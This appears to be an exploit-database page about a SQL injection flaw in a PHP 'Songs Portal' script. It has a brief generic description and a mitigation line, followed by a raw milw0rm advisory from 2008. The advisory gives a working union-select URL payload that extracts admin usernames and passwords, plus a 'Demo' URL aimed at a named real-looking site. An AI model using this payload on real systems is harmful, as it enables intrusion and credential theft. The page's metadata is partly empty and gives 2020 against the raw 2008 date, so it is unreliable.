Songs Portal Exploit

vendor:

Songs Portal

by:

Fisher

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Songs Portal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL statements that are executed in the backend database. The malicious SQL statement can be used to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

 
                          ||          ||   | ||         
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
                  ( :   /    (_)    /           (   .   
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
 
 
<<!>> Found by  :  Fisher
 
<<!>> C0ntact : sq7@w.cn
                    
<<!>> Groups : InjEctOr5 T3am  
 
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
 
 
<<->> script   : Songs Portal
 
<<->> download : www.umerinc.com/songs_portal.php
 
 
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
 
 
<<->> D0rk    :  ;)
 
<<->> Exploit :>>>
 
    :>>  http://www.site.com/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin--
 
 
 
 Demo :
 
 http://www.umerinc.com/portfolio/aamir/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin--
 
 
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
 
<<->> HCJ,Sniper_Net,broken security ,Cyb3r-1sT & all friends

# milw0rm.com [2008-12-12]